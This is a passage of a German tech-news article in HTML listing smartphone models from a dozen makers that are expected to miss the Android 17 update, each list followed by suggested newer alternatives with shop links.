<p><strong>Mögliche Alternativen: </strong><a href="https://www.amazon.de/Google-Pixel-Android-Smartphone-Dreifach-R%C3%BCckkamera-Actua-Display/dp/B0FHJNDQBR/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Google Pixel 10</a>, <a href="https://www.amazon.de/Google-Pixel-Betriebssystem-Sicherheitsupdates-Pixel-Sicherheitsfunktionen/dp/B0GGBVQR16/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Pixel 10a</a> oder ein älteres <a href="https://www.amazon.de/Google-Pixel-45-W-USB-C-Ladeger%C3%A4t-Android-Smartphone-Kamerafunktion/dp/B0FC2ND3GM/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Pixel 9</a>, das immerhin noch fünf Android-Updates erhält.</p>



<h2 class="wp-block-heading">Samsung Galaxy</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3b79e7f291e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/Tech-Advisor-Best-Samsung-Galaxy-Phones.png?w=1200" alt="" class="wp-image-2883492" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<p>Samsung versorgt seine Smartphones zwar recht lange mit Updates, doch auch hier fallen vordergründig ältere Flaggschiffe, Foldables und Mittelklassegeräte raus und bekommen kein Android 17 mehr:</p>



<ul class="wp-block-list">
<li><strong>Galaxy-S22-Serie</strong></li>



<li><strong>Galaxy-S21-Serie</strong>, inklusive <strong>S21 FE</strong></li>



<li><strong>Galaxy Z Fold4, Z Flip4, Z Fold3 </strong>und <strong>Z Flip3</strong></li>



<li><strong>Galaxy A53, A33, A23, A13</strong></li>



<li><strong>Galaxy A52, A52 5G, A52s</strong></li>



<li>ältere Galaxy-A-, M- und F-Modelle</li>
</ul>



<p><strong>Mögliche Alternativen:</strong> Die neue <a href="https://www.amazon.de/Samsung-Smartphone-Speicher-Prozessor-Herstellergarantie/dp/B0G7G5RPPM/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Samsung-Galaxy-S26-Serie</a> ist erschienen, und auch das <a href="https://www.amazon.de/Samsung-Smartphone-Speicher-50-MP-Kamera-Herstellergarantie/dp/B0DPN6824Q/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">S25</a> ist empfehlenswert (und deutlich günstiger geworden). Auch Samsungs Mittelklasse-Geräte müssen sich nicht verstecken. <a href="https://www.pcwelt.de/article/1204479/test-das-beste-samsung-galaxy-smartphone.html" target="_blank" rel="noreferrer noopener">Hier finden Sie unsere Liste der besten Galaxy-Smartphones.</a></p>



<h2 class="wp-block-heading">Xiaomi, Redmi und Poco</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3b79e7f30ba"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/xiaomi_17_v_ultra.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Xiaomi 17 and Xiaomi 17 Ultra" class="wp-image-3091409" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Foundry</p></div>



<p>Bei Xiaomi ist die Einschätzung, welche Smartphones Android 17 nicht mehr bekommen, etwas schwieriger. Die Update-Versprechen können, je nach Serie und Region, variieren. Diese Modelle dürften aber leer ausgehen:</p>



<ul class="wp-block-list">
<li>Xiaomi 12, Pro, X, T, T Pro</li>



<li>Xiaomi 11T, T Pro</li>



<li>Mi 11-Serie</li>



<li>Redmi Note 12-Serie</li>



<li>Redmi Note 11-Serie</li>



<li>Poco F4, X5 und X5 Pro</li>



<li>ältere Poco-M- und Poco-C-Modelle</li>
</ul>



<p><strong>Mögliche Alternativen:</strong> Neu erschienen sind unter anderem die <a href="https://www.amazon.de/XIAOMI-17-Smartphone-Speicher-Bildsensor/dp/B0G4BWV6D8/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Xiaomi 17</a> Serie sowie das <a href="https://www.amazon.de/XIAOMI-X8-Pro-Ultra-helles-Hauptkamera/dp/B0GHN6K5ZR/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Xiaomi Poco X8 Pro</a>.</p>



<h2 class="wp-block-heading">Oppo</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3b79e7f3848"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/Oppo-Find-X9-Ultra-colours.png" alt="Oppo Find X9 Ultra colours" class="wp-image-3111287" width="892" height="696" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Yogesh Brar</p></div>



<p>Diese Oppo-Modelle sind sehr wahrscheinlich nicht mehr bei Android 17 dabei:</p>



<ul class="wp-block-list">
<li><strong>Oppo Find X5, X5 Pro </strong>und <strong>X3</strong></li>



<li><strong>Oppo Reno8-Serie</strong></li>



<li><strong>Oppo Reno9-Serie</strong></li>



<li>ältere Reno-Modelle</li>



<li>ältere A-Modelle, etwa <strong>A76, A77, A78</strong></li>



<li>ältere Find-X- und Find-N-Modelle</li>
</ul>



<p><strong>Mögliche Alternativen:</strong> Das neue <a href="https://www.amazon.de/OPPO-Dual-SIM-Android-Type-C-White-Seidenwei%C3%9F/dp/B0FY6XJY8Y/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Oppo Find X9 Pro</a> hat uns <a href="https://www.pcwelt.de/article/2967222/oppo-find-x9-pro-test.html" target="_blank" rel="noreferrer noopener">im Test</a> überzeugt, gehört aber zur höheren Preisklasse. Das <a href="https://www.amazon.de/OPPO-Android-Smartphone-Ultra-Weitwinkel-Selfiekamera-SUPERVOOC-Ladeger%C3%A4t-Aurora-Blue/dp/B0GK9J8FQ9/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Oppo Reno 15</a> ist auch neu und unter 500 Euro erhältlich.</p>



<h2 class="wp-block-heading">Honor</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3b79e7f3fc7"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/05/honor-400er-serie-Smartphones.png?w=1200" alt="Honor 400er-Serie Smartphones" class="wp-image-2794661" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Honor</p></div>



<p>Bei Honor dürften vor allem Geräte dieser Generationen auslaufen:</p>



<ul class="wp-block-list">
<li><strong>Honor Magic4-Serie</strong></li>



<li><strong>Honor 70</strong></li>



<li><strong>Honor 90</strong></li>



<li><strong>Honor X7-Serie</strong></li>



<li><strong>Honor X8-Serie</strong></li>



<li><strong>Honor X9-Serie</strong></li>



<li>ältere Honor-X-Modelle</li>
</ul>



<p><strong>Mögliche Alternativen: </strong>Das <a href="https://www.amazon.de/Honor-Magic8-Pro-512GB-Black/dp/B0G261N9WT/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Honor Magic 8 Pro</a> ist neu erschienen und <a href="https://www.pcwelt.de/article/3041397/honor-magic-8-pro-test.html" target="_blank" rel="noreferrer noopener">überzeugt</a> als leistungsstarkes Premium-Smartphone. In der Mittelklasse findet man eher das <a href="https://www.amazon.de/HONOR-AI-Superzoom-Kamera-Schnellladung-ultrahelles-5-Sterne-Stern-Sturzfestigkeit/dp/B0F3XQPGNJ/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Honor 400</a> und zahlt dafür unter 300 Euro.</p>



<h2 class="wp-block-heading">OnePlus</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3b79e80062f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/OnePlus-15T.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="" class="wp-image-3091946" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">OnePlus</p></div>



<p>Diese OnePlus-Smartphones dürften kein Android 17 mehr erhalten:</p>



<ul class="wp-block-list">
<li><strong>OnePlus 10 Pro, T </strong>und <strong>R</strong></li>



<li><strong>OnePlus 9, Pro </strong>und <strong>RT</strong></li>



<li><strong>OnePlus Nord 3</strong></li>



<li><strong>OnePlus Nord 2 </strong>und <strong>2T</strong></li>



<li>ältere Nord-CE-Modelle</li>
</ul>



<p><strong>Mögliche Alternativen:</strong> Das neue <a href="https://www.amazon.de/OnePlus-Smartphone-Tri-Chip-AI-Dreifach-50MP-kamera-Unendliches/dp/B0FSDPR9MD/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">OnePlus 15</a> wurde von <a href="https://www.pcwelt.de/article/2972780/oneplus-15-test-handy-flaggschiff.html" target="_blank" rel="noreferrer noopener">unserem Tester</a> zum schnellsten Smartphone des Jahres 2025 gekürt und bekommt voraussichtlich noch vier Android-Updates (inklusive Android 17).</p>



<h2 class="wp-block-heading">Motorola</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3b79e800e4f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/Motorola-Edge-70-Pro.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Motorola Edge 70 Pro" class="wp-image-3127517" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Motorola</p></div>



<p>Bei Motorola fallen vor allem ältere Edge- und Moto-G-Modelle heraus:</p>



<ul class="wp-block-list">
<li><strong>Motorola Edge 40 </strong>und <strong>40 Pro</strong></li>



<li><strong>Motorola Edge 30-Serie</strong></li>



<li><strong>Moto G84, G73 </strong>und <strong>G72</strong></li>



<li><strong>Moto G62, G54 </strong>und <strong>G53</strong></li>



<li>ältere Moto-G-Modelle</li>
</ul>



<p><strong>Mögliche Alternativen: </strong>Das <a href="https://www.amazon.de/Motorola-pOLED-Display-50-MP-Moto-AI-Kamera-widerstandsf%C3%A4hig-wassergesch%C3%BCtzt/dp/B0DZ6QCSST/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Motorola Edge 60</a> hat ein gutes Preis-Leistungs-Verhältnis und sieht dazu noch schick aus.</p>



<h2 class="wp-block-heading">Nothing</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3b79e80185e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Nothing-Phone-4a-Pro-all-colours-back-angled-fan.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Nothing Phone 4a Pro all colours back angled fan" class="wp-image-3079268" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Foundry | Alex Walker-Todd</p></div>



<p>Bei Nothing ist die Liste erfreulich kurz, denn die meisten erhalten Android 17. Nur diese fallen raus:</p>



<ul class="wp-block-list">
<li><strong>Nothing Phone (1)</strong></li>



<li><strong>Nothing Phone (2)</strong></li>



<li><strong>CMF Phone 1</strong></li>
</ul>



<p><strong>Mögliche Alternativen: </strong>Das neue <a href="https://www.amazon.de/Nothing-Phone-Pro-Triple-Kamera-Metall-Unibody/dp/B0GHNRLJX8/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Nothing Phone 4a Pro</a>.</p>



<h2 class="wp-block-heading">Sony Xperia</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3b79e802289"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/05/sony-xperia-1-vii-1.png?w=1200" alt="sony xperia 1 vii 1" class="wp-image-2779408" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Sony</p></div>



<p>Sony liefert traditionell kürzer Updates als viele Konkurrenten. Diese Modelle dürften daher leer ausgehen:</p>



<ul class="wp-block-list">
<li><strong>Xperia 1 V</strong></li>



<li><strong>Xperia 5 V</strong></li>



<li><strong>Xperia 10 V</strong></li>



<li><strong>Xperia 1 IV</strong></li>



<li><strong>Xperia 5 IV</strong></li>



<li><strong>Xperia 10 IV</strong></li>



<li>ältere Xperia-Modelle</li>
</ul>



<p><strong>Mögliche Alternativen: </strong>Das neue <a href="https://www.amazon.de/Sony-Xperia-VII-Akkulaufzeit-Brennweiten/dp/B0FPDFGFLZ/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Sony Xperia 10 VII</a> oder das <a href="https://www.amazon.de/Sony-Xperia-VII-Dreifachobjektiv-Ultraweitwinkel-Objektiv/dp/B0F67B93YS/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Sony Xperia 1 VII</a>.</p>



<h2 class="wp-block-heading">Realme</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3b79e802d27"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/05/Realme-GT-7-3-1.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="" class="wp-image-2794913" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Realme</p></div>



<p>Diese Realme-Modelle dürften Android 17 nicht mehr erhalten:</p>



<ul class="wp-block-list">
<li><strong>Realme GT 2, Pro</strong></li>



<li><strong>Realme GT Neo 3, 3T</strong></li>



<li><strong>Realme 10-Serie</strong></li>



<li><strong>Realme 11-Serie</strong></li>



<li><strong>Realme C55 </strong>und <strong>C53</strong></li>



<li>ältere Realme-C-Modelle</li>



<li>ältere Narzo-Modelle</li>
</ul>



<p><strong>Mögliche Alternativen:</strong> Das neue <a href="https://www.amazon.de/realme-Smartphone-Flachdisplay-Schnellladung-KI-Funktionen-Violett/dp/B0GL231SGC/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Realme 16 Pro.</a></p>



<h2 class="wp-block-heading">Asus</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3b79e80356f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/01/Asus-zenphone.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Asus zenphone" class="wp-image-3036644" width="1200" height="544" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p></p>
</figcaption></figure><p class="imageCredit">Asus</p></div>



<p>Bei Asus ist die Liste überschaubar. Diese Modelle dürften nicht mehr bei Android 17 am Start sein:</p>



<ul class="wp-block-list">
<li><strong>Zenfone 10</strong></li>



<li><strong>Zenfone 9</strong></li>



<li><strong>ROG Phone 8, Pro</strong></li>



<li><strong>ROG Phone 8 Pro</strong></li>



<li><strong>ROG Phone 7, Ultimate</strong></li>



<li>ältere ROG- und Zenfone-Modelle</li>
</ul>



<p><strong>Mögliche Alternativen:</strong> Asus hat sich vorerst aus dem Smartphone-Markt zurückgezogen, daher sollten Sie auf andere Hersteller setzen.</p>



<h2 class="wp-block-heading">Vivo</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3b79e803c53"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/Vivo-X300-Pro-hands-on-1.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Vivo X300 Pro hands on 1" class="wp-image-2941605" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Bei Vivo gibt es wenige offizielle Angaben zur Verfügbarkeit von Android 17. Diese Modelle könnten aber leer ausgehen:</p>



<ul class="wp-block-list">
<li><strong>Vivo V30, Pro</strong></li>



<li><strong>Vivo V29, V29 Pro</strong></li>



<li><strong>Vivo V27, Pro</strong></li>



<li><strong>Vivo X90, X90 Pro</strong></li>



<li><strong>Vivo X80-Serie</strong></li>



<li>ältere Vivo-Y-Modelle vor 2024</li>



<li>ältere Vivo-T-Modelle</li>
</ul>



<p><strong>Mögliche Alternativen:</strong> Das neue <a href="https://www.amazon.de/vivo-Super-Telekamera-AMOLED-Display-5-400-mAh-Akku-3D-Fingerabdruckscanner/dp/B0GSWF4PNK/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Vivo V70 5G</a>.</p>



<h2 class="wp-block-heading">Fazit / Faustregel</h2>



<p>Wer ein Smartphone aus dem Jahr 2022 oder älter nutzt, sollte genau hinschauen: Viele dieser Geräte bekommen Android 16 noch, Android 17 aber nicht mehr. Besonders betroffen sind ältere Flaggschiffe wie Galaxy S22, OnePlus 10 Pro, Xiaomi 12 oder Sony Xperia 1 V sowie viele Mittelklassegeräte aus den Jahren 2021 bis 2023.</p>



